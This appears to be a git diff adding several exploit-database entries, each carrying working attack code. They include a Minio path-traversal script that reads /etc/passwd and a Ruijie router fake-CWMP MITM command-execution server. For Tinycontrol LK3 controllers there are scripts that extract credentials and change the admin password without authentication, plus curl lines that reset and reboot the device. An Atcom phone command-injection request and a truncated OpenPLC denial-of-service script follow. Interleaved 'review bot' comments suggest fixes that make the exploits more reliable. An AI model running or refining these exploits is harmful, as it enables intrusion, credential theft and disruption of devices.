diff --git a/exploits/go/webapps/51734.py b/exploits/go/webapps/51734.py
new file mode 100755
index 000000000..b8c8bbc7f
--- /dev/null
+++ b/exploits/go/webapps/51734.py
@@ -0,0 +1,81 @@ +# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal +# Date: 2023-09-02 +# Exploit Author: Jenson Zhao +# Vendor Homepage: https://min.io/ +# Software Link: https://github.com/minio/minio/ +# Version: Up to (excluding) 2022-07-29T19-40-48Z +# Tested on: Windows 10 +# CVE : CVE-2022-35919 +# Required before execution: pip install minio,requests +import urllib.parse +import requests, json, re, datetime, argparse +from minio.credentials import Credentials +from minio.signer import sign_v4_s3 + + +class MyMinio(): + secure = False + + def __init__(self, base_url, access_key, secret_key): + self.credits = Credentials( + access_key=access_key, + secret_key=secret_key + ) + if base_url.startswith('http://') and base_url.endswith('/'): + self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' + elif base_url.startswith('https://') and base_url.endswith('/'): + self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' + self.secure = True + else: + print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n') + + def poc(self): + datetimes = datetime.datetime.utcnow() + datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') + urls = urllib.parse.urlparse(self.url) + headers = { + 'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', + 'X-Amz-Date': datetime_str, + 'Host': urls.netloc, + } + headers = sign_v4_s3( + method='POST', + url=urls, + region='', + headers=headers, + credentials=self.credits, + content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', + date=datetimes, + ) + if self.secure: + response = requests.post(url=self.url, headers=headers, verify=False) + else: + response = requests.post(url=self.url, headers=headers) + try: + message = json.loads(response.text)['Message'] + pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)' + matches = re.findall(pattern, message) + if matches: + 
print('There is CVE-2022-35919 problem with the url!') + print('The contents of the /etc/passwd file are as follows:') + for match in matches: + print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5], + match[6])) + else: + print('There is no CVE-2022-35919 problem with the url!') + print('Here is the response message content:') + print(message) + except Exception as e: + print( + 'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:') + print(response.text) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/") + parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") + parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") + args = parser.parse_args() + minio = MyMinio(args.url, args.accesskey, args.secretkey) + minio.poc() \ No newline at end of file diff --git a/exploits/hardware/dos/51730.txt b/exploits/hardware/dos/51730.txt new file mode 100644 index 000000000..6dd68d3f0 --- /dev/null +++ b/exploits/hardware/dos/51730.txt 
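Review bot: The final `else` in `MyMinio.__init__` only prints the usage text and leaves `self.url` unset, so a bad base URL surfaces later as an AttributeError at `urllib.parse.urlparse(self.url)` inside `poc()` rather than a clear error; replace the print with `raise ValueError('base_url must start with "http://" or "https://" and end with "/"')`. The `except Exception as e` around the response parsing discards `e` and prints only the body, which hides whether the failure was a JSON decode error or a missing `Message` key — narrow it to `except (ValueError, KeyError) as e:` and include `e` in the output. The HTTPS branch passes `verify=False`, which disables certificate validation without telling the operator; at minimum print that TLS verification is off, or make it opt-in via a flag.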
@@ -0,0 +1,47 @@
+Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service
+Exploit Author: LiquidWorm
+
+Vendor: Tinycontrol
+Product web page: https://www.tinycontrol.pl
+Affected version: <=1.58a, HW 3.8
+
+Summary: Lan Controller is a very universal
+device that allows you to connect many different
+sensors and remotely view their readings and
+remotely control various types of outputs.
+It is also possible to combine both functions
+into an automatic if -> this with a calendar
+when -> then. The device provides a user interface
+in the form of a web page. The website presents
+readings of various types of sensors: temperature,
+humidity, pressure, voltage, current. It also
+allows you to configure the device, incl. event
+setting and controlling up to 10 outputs. Thanks
+to the support of many protocols, it is possible
+to operate from smartphones, collect and observ
+the results on the server, as well as cooperation
+with other I/O systems based on TCP/IP and Modbus.
+
+Desc: The controller suffers from an unauthenticated
+remote denial of service vulnerability. An attacker
+can issue direct requests to the stm.cgi page to
+reboot and also reset factory settings on the device.
+
+Tested on: lwIP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5785
+Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php
+
+
+18.08.2023
+
+--
+
+
+$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings
+$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller
\ No newline at end of file
diff --git a/exploits/hardware/remote/51727.txt b/exploits/hardware/remote/51727.txt
new file mode 100644
index 000000000..e705ee23c
--- /dev/null
+++ b/exploits/hardware/remote/51727.txt
@@ -0,0 +1,176 @@ +# Exploit Title: Ruijie Reyee Wireless Router firmware version B11P204 - MITM Remote Code Execution (RCE) +# Date: April 15, 2023 +# Exploit Author: Mochammad Riyan Firmansyah of SecLab Indonesia +# Vendor Homepage: https://ruijienetworks.com +# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204 +# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400) +# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO + +""" +Summary +======= +The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection. +In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request. +Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server. +Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system. + +This advisory has also been published at https://github.com/ruzfi/advisory/tree/main/ruijie-wireless-router-mitm-rce. 
+""" + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from html import escape, unescape +import http.server +import socketserver +import io +import time +import re +import argparse +import gzip + +# command payload +command = "uname -a" + +# change this to serve on a different port +PORT = 8080 + +def cwmp_inform(soap): + cwmp_id = re.search(r"(?:)(.*?)(?:<\/cwmp:ID>)", soap).group(1) + product_class = re.search(r"(?:)(.*?)(?:<\/ProductClass>)", soap).group(1) + serial_number = re.search(r"(?:)(.*?)(?:<\/SerialNumber>)", soap).group(1) + result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}} + parameters = re.findall(r"(?:

)(.*?)(?:<\/P>)", soap) + for parameter in parameters: + parameter_name = re.search(r"(?:)(.*?)(?:<\/N>)", parameter).group(1) + parameter_value = re.search(r"(?:)(.*?)(?:<\/V>)", parameter).group(1) + result['parameters'][parameter_name] = parameter_value + return result + +def cwmp_inform_response(): + return """ +1611""" + +def command_payload(command): + current_time = time.time() + result = """ +ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}1config{command}""".format(cur_time=current_time, command=command) + return result + +def command_response(soap): + cwmp_id = re.search(r"(?:)(.*?)(?:<\/cwmp:ID>)", soap).group(1) + command = re.search(r"(?:)(.*?)(?:<\/Command>)", soap).group(1) + response = re.search(r"(?:)((\n|.)*?)(?:<\/Response>)", soap).group(1) + result = {'cwmp_id': cwmp_id, 'command': command, 'response': response} + return result + +class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): + protocol_version = 'HTTP/1.1' + def do_GET(self): + self.send_response(204) + self.end_headers() + + def do_POST(self): + print("[*] Got hit by", self.client_address) + + f = io.BytesIO() + if 'service' in self.path: + stage, info = self.parse_stage() + if stage == "cwmp_inform": + self.send_response(200) + print("[!] 
Got Device information", self.client_address) + print("[*] Product Class:", info['product_class']) + print("[*] Serial Number:", info['serial_number']) + print("[*] MAC Address:", info['parameters']['mac']) + print("[*] STUN Client IP:", info['parameters']['stunclientip']) + payload = bytes(cwmp_inform_response(), 'utf-8') + f.write(payload) + self.send_header("Content-Length", str(f.tell())) + elif stage == "command_request": + self.send_response(200) + self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly") + print("[*] Device interacting", self.client_address) + print(info) + payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8') + f.write(payload) + self.send_header("Content-Length", str(f.tell())) + else: + print("[*] Command response", self.client_address) + print(unescape(info['response'])) + self.send_response(204) + f.write(b"") + else: + print("[x] Received invalid request", self.client_address) + self.send_response(204) + f.write(b"") + + f.seek(0) + self.send_header("Connection", "keep-alive") + self.send_header("Content-type", "text/xml;charset=utf-8") + self.end_headers() + if f: + self.copyfile(f, self.wfile) + f.close() + + def parse_stage(self): + content_length = int(self.headers['Content-Length']) + post_data = gzip.decompress(self.rfile.read(content_length)) + if "cwmp:Inform" in post_data.decode("utf-8"): + return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8"))) + elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"): + return ("command_response", command_response(post_data.decode("utf-8"))) + else: + return ("command_request", "Ping!") + + def log_message(self, format, *args): + return + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument('--bind', '-b', default='', metavar='ADDRESS', + help='Specify alternate bind address ' + '[default: all interfaces]') + parser.add_argument('port', 
action='store', + default=PORT, type=int, + nargs='?', + help='Specify alternate port [default: {}]'.format(PORT)) + args = parser.parse_args() + + Handler = CustomHTTPRequestHandler + with socketserver.TCPServer((args.bind, args.port), Handler) as httpd: + ip_addr = args.bind if args.bind != '' else '0.0.0.0' + print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port)) + try: + httpd.serve_forever() + except KeyboardInterrupt: + pass + httpd.server_close() + + +""" +Output +====== +ubuntu:~$ python3 exploit.py +[!] serving fake CWMP server at 0.0.0.0:8080 +[*] Got hit by ('[redacted]', [redacted]) +[!] Got Device information ('[redacted]', [redacted]) +[*] Product Class: EW1200G-PRO +[*] Serial Number: [redacted] +[*] MAC Address: [redacted] +[*] STUN Client IP: [redacted]:[redacted] +[*] Got hit by ('[redacted]', [redacted]) +[*] Device interacting ('[redacted]', [redacted]) +Ping! +[*] Got hit by ('[redacted]', [redacted]) +[*] Command response ('[redacted]', [redacted]) +PING 127.0.0.1 (127.0.0.1): 56 data bytes +64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms +64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms +64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms +64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms + +--- 127.0.0.1 ping statistics --- +4 packets transmitted, 4 packets received, 0% packet loss +round-trip min/avg/max = 0.300/0.335/0.400 ms +Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux + +""" \ No newline at end of file diff --git a/exploits/hardware/remote/51731.py b/exploits/hardware/remote/51731.py new file mode 100755 index 000000000..23b6c1055 --- /dev/null +++ b/exploits/hardware/remote/51731.py 
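Review bot: `parse_stage` calls `int(self.headers['Content-Length'])` and `gzip.decompress(...)` with no guard, so any client POST to a `/service` path that lacks the header or carries a non-gzip body raises inside `do_POST` and the exception escapes the handler instead of reaching the 204 branch; read the header with `.get()` and catch the decompress/decode errors, returning a stage that `do_POST` can route to its invalid-request path (it currently sends every unknown stage into the `else:` branch, which indexes `info['response']`). In the `cwmp_inform` branch, `info['parameters']['mac']` and `info['parameters']['stunclientip']` raise KeyError when an Inform omits those parameters — `info['parameters'].get('mac')` is safer. The regexes in `cwmp_inform` and `command_response` appear on this page as `(?:)(.*?)(?:<\/cwmp:ID>)`, i.e. with an empty opening group; this looks like the page rendering stripped the opening XML tags, so the committed file may differ from what is shown here.
```python
    def parse_stage(self):
        try:
            content_length = int(self.headers.get('Content-Length') or 0)
            post_data = gzip.decompress(self.rfile.read(content_length)).decode("utf-8")
        except (ValueError, OSError, EOFError, UnicodeDecodeError):
            # malformed or non-CWMP body: let do_POST answer 204 instead of raising
            return ("invalid", None)
        # … unchanged: stage detection on post_data (now already decoded once) …
```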
@@ -0,0 +1,117 @@ +#!/usr/bin/env python +# +#Exploit Title: Tinycontrol LAN Controller v3 (LK3) - Remote Credentials Extraction +# Exploit Author: LiquidWorm +# +# Vendor: Tinycontrol +# Product web page: https://www.tinycontrol.pl +# Affected version: <=1.58a, HW 3.8 +# +# Summary: Lan Controller is a very universal +# device that allows you to connect many different +# sensors and remotely view their readings and +# remotely control various types of outputs. +# It is also possible to combine both functions +# into an automatic if -> this with a calendar +# when -> then. The device provides a user interface +# in the form of a web page. The website presents +# readings of various types of sensors: temperature, +# humidity, pressure, voltage, current. It also +# allows you to configure the device, incl. event +# setting and controlling up to 10 outputs. Thanks +# to the support of many protocols, it is possible +# to operate from smartphones, collect and observ +# the results on the server, as well as cooperation +# with other I/O systems based on TCP/IP and Modbus. +# +# Desc: An unauthenticated attacker can retrieve the +# controller's configuration backup file and extract +# sensitive information that can allow him/her/them +# to bypass security controls and penetrate the system +# in its entirety. 
+# +# Tested on: lwIP +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5786 +# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php +# +# +# 18.08.2023 +# +# + + +import subprocess +import requests +import base64 +import sys + +binb = "lk3_settings.bin" +outf = "lk3_settings.enc" +bpatt = "0upassword" +epatt = "pool.ntp.org" +startf = False +endf = False +extral = [] + +print(""" + O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O + | | + | Tinycontrol LK3 1.58 Settings DL | + | ZSL-2023-5786 | + | 2023 (c) Zero Science Lab | + | | + |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'| + | | +""") + +if len(sys.argv) != 2: + print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0])) + exit(-0) +else: + rhost=sys.argv[1] + if not "http" in rhost: + rhost="http://{}".format(rhost) + +try: + resp = requests.get(rhost + "/" + binb) + if resp.status_code == 200: + with open(outf, 'wb') as f: + f.write(resp.content) + print(f"[*] Got data as {outf}") + else: + print(f"[!] Backup failed. Status code: {resp.status_code}") +except Exception as e: + print("[!] Error:", str(e)) + exit(-1) + +binf = outf +sout = subprocess.check_output(["strings", binf], universal_newlines = True) +linea = sout.split("\n") + +for thricer in linea: + if bpatt in thricer: + startf = True + elif epatt in thricer: + endf = True + elif startf and not endf: + extral.append(thricer) + +if len(extral) >= 4: + userl = extral[1].strip() + adminl = extral[3].strip() + try: + decuser = base64.b64decode(userl).decode("utf-8") + decadmin = base64.b64decode(adminl).decode("utf-8") + print("[+] User password:", decuser) + print("[+] Admin password:", decadmin) + except Exception as e: + print("[!] Error decoding:", str(e)) +else: + print("[!] Regex failed.") + exit(-2) \ No newline at end of file diff --git a/exploits/hardware/remote/51732.txt b/exploits/hardware/remote/51732.txt new file mode 100644 index 000000000..f9f565650 
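Review bot: When the backup request returns a status other than 200, the script prints the failure but continues into `subprocess.check_output(["strings", binf])` against a file that was never written (or a stale one from an earlier run), so the run ends in an uncaught `CalledProcessError`/`FileNotFoundError` or reports passwords decoded from old data; add `exit(-1)` directly after the `print(f"[!] Backup failed. Status code: {resp.status_code}")` line. `exit(-0)` in the usage branch is `exit(0)`, which reports success for a bad invocation — use `exit(1)`. The dependency on an external `strings` binary can be removed by scanning the downloaded bytes directly, e.g. `re.findall(rb"[\x20-\x7e]{4,}", resp.content)`, which also makes the script behave the same on hosts without binutils.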
--- /dev/null
+++ b/exploits/hardware/remote/51732.txt
@@ -0,0 +1,62 @@
+#!/bin/bash
+: "
+Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
+Exploit Author: LiquidWorm
+
+Vendor: Tinycontrol
+Product web page: https://www.tinycontrol.pl
+Affected version: <=1.58a, HW 3.8
+
+Summary: Lan Controller is a very universal
+device that allows you to connect many different
+sensors and remotely view their readings and
+remotely control various types of outputs.
+It is also possible to combine both functions
+into an automatic if -> this with a calendar
+when -> then. The device provides a user interface
+in the form of a web page. The website presents
+readings of various types of sensors: temperature,
+humidity, pressure, voltage, current. It also
+allows you to configure the device, incl. event
+setting and controlling up to 10 outputs. Thanks
+to the support of many protocols, it is possible
+to operate from smartphones, collect and observ
+the results on the server, as well as cooperation
+with other I/O systems based on TCP/IP and Modbus.
+
+Desc: The application suffers from an insecure access
+control allowing an unauthenticated attacker to
+change accounts passwords and bypass authentication
+gaining panel control access.
+
+Tested on: lwIP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5787
+Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php
+
+
+18.08.2023
+
+"
+
+set -euo pipefail
+IFS=$'\n\t'
+
+if [ $# -ne 2 ]; then
+ echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'
+ exit
+fi
+
+IP=$1
+PW=$2
+
+EN=$(echo -n $PW | base64)
+
+curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==
+# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/
+echo -ne '\nAdmin password changed to: '$PW
\ No newline at end of file
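Review bot: The usage message is single-quoted, so `$0` is printed literally instead of the script name, and the `exit` that follows returns 0 for a bad invocation — `echo -ne "\nUsage: $0 [ipaddr] [desired admin pwd]\n\n"` followed by `exit 1`. `$PW`, `$IP` and `$EN` are unquoted: a password containing spaces or glob characters is word-split in `echo -n $PW`, and the curl argument contains literal `*` so the shell attempts pathname expansion on it; quote them, e.g. `EN=$(printf '%s' "$PW" | base64)` and `curl -s "http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg=="`. GNU `base64` also wraps its output at 76 characters, so a long password would be split across lines — `base64 -w0` there.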
diff --git a/exploits/hardware/remote/51742.txt b/exploits/hardware/remote/51742.txt
new file mode 100644
index 000000000..f1160bcc8
--- /dev/null
+++ b/exploits/hardware/remote/51742.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
+# Google Dork: N/A
+# Date: 07/09/2023
+# Exploit Author: Mohammed Adel
+# Vendor Homepage: https://www.atcom.cn/
+# Software Link:
+https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
+# Version: All versions above 2.7.x.x
+# Tested on: Kali Linux
+
+
+Exploit Request:
+
+POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
+Host: {TARGET_IP}
+User-Agent: polar
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Authorization: Digest username="admin", realm="IP Phone Web
+Configuration", nonce="value_here",
+uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",
+response="value_here", qop=auth, nc=value_here, cnonce="value_here"
+
+cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
+
+
+Response:
+
+{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
+
+The value of "ping_cmd_result" is encoded as base64. Decoding the
+value of "ping_cmd_result" reveals the result of the command executed
+as shown below:
+
+ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
\ No newline at end of file
diff --git a/exploits/multiple/dos/51746.txt b/exploits/multiple/dos/51746.txt
new file mode 100644
index 000000000..059fe1ca7
--- /dev/null
+++ b/exploits/multiple/dos/51746.txt
@@ -0,0 +1,116 @@ +# Exploit Title: OpenPLC WebServer 3 - Denial of Service +# Date: 10.09.2023 +# Exploit Author: Kai Feng +# Vendor Homepage: https://autonomylogic.com/ +# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git +# Version: Version 3 and 2 +# Tested on: Ubuntu 20.04 + + +import requests +import sys +import time +import optparse +import re + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)") +parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login") +parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login") +parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection") +parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection") + +options, args = parser.parse_args() +if not options.url: + print('[+] Remote Code Execution on OpenPLC_v3 WebServer') + print('[+] Specify an url target') + print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444") + exit() + +host = options.url +login = options.url + '/login' +upload_program = options.url + '/programs' +compile_program = options.url + '/compile-program?file=681871.st' +run_plc_server = options.url + '/start_plc' +user = options.user +password = options.passw +rev_ip = options.rip +rev_port = options.rport +x = requests.Session() + +def auth(): + print('[+] Remote Code Execution on OpenPLC_v3 WebServer') + time.sleep(1) + print('[+] Checking if host '+host+' is Up...') + host_up = x.get(host) + try: + if host_up.status_code == 200: + print('[+] Host Up! 
...') + except: + print('[+] This host seems to be down :( ') + sys.exit(0) + + print('[+] Trying to authenticate with credentials '+user+':'+password+'') + time.sleep(1) + submit = { + 'username': user, + 'password': password + } + x.post(login, data=submit) + response = x.get(upload_program) + + if len(response.text) > 30000 and response.status_code == 200: + print('[+] Login success!') + time.sleep(1) + else: + print('[x] Login failed :(') + sys.exit(0) + +def injection(): + print('[+] PLC program uploading... ') + upload_url = host + "/upload-program" + upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"} + upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"} + upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; 
name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n" + upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) + + act_url = host + "/upload-program-action" + act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"} + act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n" + upload_act = x.post(act_url, headers=act_headers, data=act_data) + time.sleep(2) + +def connection(): + print('[+] add device...') + inject_url = host + "/add-modbus-device" + # inject_dash = host + "/dashboard" + inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"} + inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) 
Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"} + inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 